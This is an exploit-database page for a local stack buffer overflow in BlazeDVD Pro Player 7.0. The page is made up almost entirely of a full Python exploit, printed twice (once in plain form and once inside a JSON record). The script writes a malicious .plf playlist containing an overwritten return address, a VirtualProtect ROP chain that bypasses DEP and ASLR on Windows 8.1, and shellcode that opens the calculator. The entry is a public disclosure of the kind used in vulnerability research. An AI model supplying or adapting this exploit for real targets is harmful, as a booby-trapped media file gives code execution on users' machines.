Search...

BlazeDVD Pro Player 7.0 - .plf Direct RET Local Stack Buffer Overflow

2014-08-12T00:00:00

ID EXPLOITPACK:55B541AABE9FEC44813C0D8B453FED71
Type exploitpack
Reporter Giovanni Bartolomucci
Modified 2014-08-12T00:00:00

Description

BlazeDVD Pro Player 7.0 - .plf Direct RET Local Stack Buffer Overflow

                                        
                                            # BlazeDVD Pro v7.0 - (.plf) Stack Based Buffer Overflow (direct RET) - ALSR/DEP bypass on Win8.1 Pro
# Date: Mon, Aug 11 2014 12:58:06 GMT
# Exploit Author: Giovanni Bartolomucci
# Vendor Homepage: http://www.blazevideo.com/
# Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
# Version: 7.0.0.0
# Tested on: Windows 8.1 Pro
# h/t to corelanc0d3r and b33f for their tutorials

#!/usr/bin/python
 
import sys, struct
 
file = "calc.plf"

junk1   = "\x41"*260
neweip  = "\x5b\x51\x32\x60"
junk2   = "\x41"*24

rop =  "\x41\x47\x32\x60" # POP EBP # RETN [Configuration.dll]
rop += "\xb5\x59\x33\x60" # &(PUSH ESP # RET 0x0C) [Configuration.dll]
rop += "\xf6\x07\x33\x60" # POP EAX # RET [Configuration.dll]
rop += "\x91\x11\x11\x11" # Value to be subtracted, will become 0x000000080
rop += "\x39\x03\x33\x60" # POP ECX # RETN [Configuration.dll]
rop += "\x11\x11\x11\x11" # Value to subtract
rop += "\xda\x6d\x32\x60" # SUB EAX,ECX # RETN [Configuration.dll]
rop += "\x7d\x41\x32\x60" # XCHG EAX,EBX # XOR AL,60 # RETN [Configuration.dll]
rop += "\xf6\x07\x33\x60" # POP EAX # RETN [Configuration.dll]
rop += "\x47\x98\x31\x60" # Junk R address
rop += "\x47\x98\x31\x60" # POP EDX # ADD AL,BYTE PTR ES:[EAX] # NOP # NOP # NOP # NOP # NOP # MOV EAX,Configur.60346A70 # RETN [Configuration.dll]
rop += "\x51\x11\x11\x11" # Value to be subtracted, will become 0x000000040
rop += "\xf6\x07\x33\x60" # POP EAX # RETN [Configuration.dll]
rop += "\x11\x11\x11\x11" # Value to subtract
rop += "\x78\x8b\x30\x60" # SUB EDX,EAX # XOR EAX,EAX # CMP ECX,EDX # SETG AL # RETN 0x04 [Configuration.dll]
rop += "\x8c\xf0\x33\x60" # POP ECX # RETN [Configuration.dll]
rop += "\x41\x41\x41\x41" # Junk
rop += "\x0b\x17\x36\x60" # & Writable location [Configuration.dll]
rop += "\xee\x78\x32\x60" # POP EDI # RETN [Configuration.dll]
rop += "\x09\x48\x32\x60" # RETN (ROP NOP) [Configuration.dll]
rop += "\x65\x08\x33\x60" # POP EAX # RETN [Configuration.dll]
rop += "\xcc\x42\x05\x64" # ptr to &VirtualProtect() [IAT MediaPlayerCtrl.dll]
rop += "\xed\xd6\x33\x60" # MOV ESI,DWORD PTR DS:[EAX] # RETN [Configuration.dll]
rop += "\xa2\x92\x32\x60" # POP EAX # RETN [Configuration.dll]
rop += "\x90\x90\x90\x90" # NOP
rop += "\x28\xc3\x33\x60" # PUSHAD # RETN [Configuration.dll]

shellcode = ("\x66\x81\xE4\xFC\xFF\x31\xD2\x52\x68\x63"
             "\x61\x6C\x63\x89\xE6\x52\x56\x64\x8B\x72"
             "\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30"
             "\x8B\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78"
             "\x8B\x74\x1F\x20\x01\xFE\x8B\x4C\x1F\x24"
             "\x01\xF9\x42\xAD\x81\x3C\x07\x57\x69\x6E"
             "\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
             "\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7\xCC")

exploit = junk1 + neweip + junk2 + rop + shellcode
 
writeFile = open(file, "w")
writeFile.write(exploit)
writeFile.close()

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:06", "references": [], "description": "\nBlazeDVD Pro Player 7.0 - .plf Direct RET Local Stack Buffer Overflow", "edition": 1, "reporter": "Giovanni Bartolomucci", "exploitpack": {"type": "local", "platform": "windows"}, "published": "2014-08-12T00:00:00", "title": "BlazeDVD Pro Player 7.0 - .plf Direct RET Local Stack Buffer Overflow", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:06", "rev": 2}, "score": {"value": 0.3, "vector": "NONE", "modified": "2020-04-01T19:04:06", "rev": 2}, "vulnersScore": 0.3}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2014-08-12T00:00:00", "id": "EXPLOITPACK:55B541AABE9FEC44813C0D8B453FED71", "href": "", "viewCount": 1, "sourceData": "# BlazeDVD Pro v7.0 - (.plf) Stack Based Buffer Overflow (direct RET) - ALSR/DEP bypass on Win8.1 Pro\n# Date: Mon, Aug 11 2014 12:58:06 GMT\n# Exploit Author: Giovanni Bartolomucci\n# Vendor Homepage: http://www.blazevideo.com/\n# Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe\n# Version: 7.0.0.0\n# Tested on: Windows 8.1 Pro\n# h/t to corelanc0d3r and b33f for their tutorials\n\n#!/usr/bin/python\n \nimport sys, struct\n \nfile = \"calc.plf\"\n\njunk1 = \"\\x41\"*260\nneweip = \"\\x5b\\x51\\x32\\x60\"\njunk2 = \"\\x41\"*24\n\nrop = \"\\x41\\x47\\x32\\x60\" # POP EBP # RETN [Configuration.dll]\nrop += \"\\xb5\\x59\\x33\\x60\" # &(PUSH ESP # RET 0x0C) [Configuration.dll]\nrop += \"\\xf6\\x07\\x33\\x60\" # POP EAX # RET [Configuration.dll]\nrop += \"\\x91\\x11\\x11\\x11\" # Value to be subtracted, will become 0x000000080\nrop += \"\\x39\\x03\\x33\\x60\" # POP ECX # RETN [Configuration.dll]\nrop += \"\\x11\\x11\\x11\\x11\" # Value to subtract\nrop += \"\\xda\\x6d\\x32\\x60\" # SUB EAX,ECX # RETN [Configuration.dll]\nrop += \"\\x7d\\x41\\x32\\x60\" # XCHG EAX,EBX # XOR AL,60 # RETN [Configuration.dll]\nrop += \"\\xf6\\x07\\x33\\x60\" # POP EAX # RETN [Configuration.dll]\nrop += \"\\x47\\x98\\x31\\x60\" # Junk R address\nrop += \"\\x47\\x98\\x31\\x60\" # POP EDX # ADD AL,BYTE PTR ES:[EAX] # NOP # NOP # NOP # NOP # NOP # MOV EAX,Configur.60346A70 # RETN [Configuration.dll]\nrop += \"\\x51\\x11\\x11\\x11\" # Value to be subtracted, will become 0x000000040\nrop += \"\\xf6\\x07\\x33\\x60\" # POP EAX # RETN [Configuration.dll]\nrop += \"\\x11\\x11\\x11\\x11\" # Value to subtract\nrop += \"\\x78\\x8b\\x30\\x60\" # SUB EDX,EAX # XOR EAX,EAX # CMP ECX,EDX # SETG AL # RETN 0x04 [Configuration.dll]\nrop += \"\\x8c\\xf0\\x33\\x60\" # POP ECX # RETN [Configuration.dll]\nrop += \"\\x41\\x41\\x41\\x41\" # Junk\nrop += \"\\x0b\\x17\\x36\\x60\" # & Writable location [Configuration.dll]\nrop += \"\\xee\\x78\\x32\\x60\" # POP EDI # RETN [Configuration.dll]\nrop += \"\\x09\\x48\\x32\\x60\" # RETN (ROP NOP) [Configuration.dll]\nrop += \"\\x65\\x08\\x33\\x60\" # POP EAX # RETN [Configuration.dll]\nrop += \"\\xcc\\x42\\x05\\x64\" # ptr to &VirtualProtect() [IAT MediaPlayerCtrl.dll]\nrop += \"\\xed\\xd6\\x33\\x60\" # MOV ESI,DWORD PTR DS:[EAX] # RETN [Configuration.dll]\nrop += \"\\xa2\\x92\\x32\\x60\" # POP EAX # RETN [Configuration.dll]\nrop += \"\\x90\\x90\\x90\\x90\" # NOP\nrop += \"\\x28\\xc3\\x33\\x60\" # PUSHAD # RETN [Configuration.dll]\n\nshellcode = (\"\\x66\\x81\\xE4\\xFC\\xFF\\x31\\xD2\\x52\\x68\\x63\"\n \"\\x61\\x6C\\x63\\x89\\xE6\\x52\\x56\\x64\\x8B\\x72\"\n \"\\x30\\x8B\\x76\\x0C\\x8B\\x76\\x0C\\xAD\\x8B\\x30\"\n \"\\x8B\\x7E\\x18\\x8B\\x5F\\x3C\\x8B\\x5C\\x1F\\x78\"\n \"\\x8B\\x74\\x1F\\x20\\x01\\xFE\\x8B\\x4C\\x1F\\x24\"\n \"\\x01\\xF9\\x42\\xAD\\x81\\x3C\\x07\\x57\\x69\\x6E\"\n \"\\x45\\x75\\xF5\\x0F\\xB7\\x54\\x51\\xFE\\x8B\\x74\"\n \"\\x1F\\x1C\\x01\\xFE\\x03\\x3C\\x96\\xFF\\xD7\\xCC\")\n\nexploit = junk1 + neweip + junk2 + rop + shellcode\n \nwriteFile = open(file, \"w\")\nwriteFile.write(exploit)\nwriteFile.close()", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": []}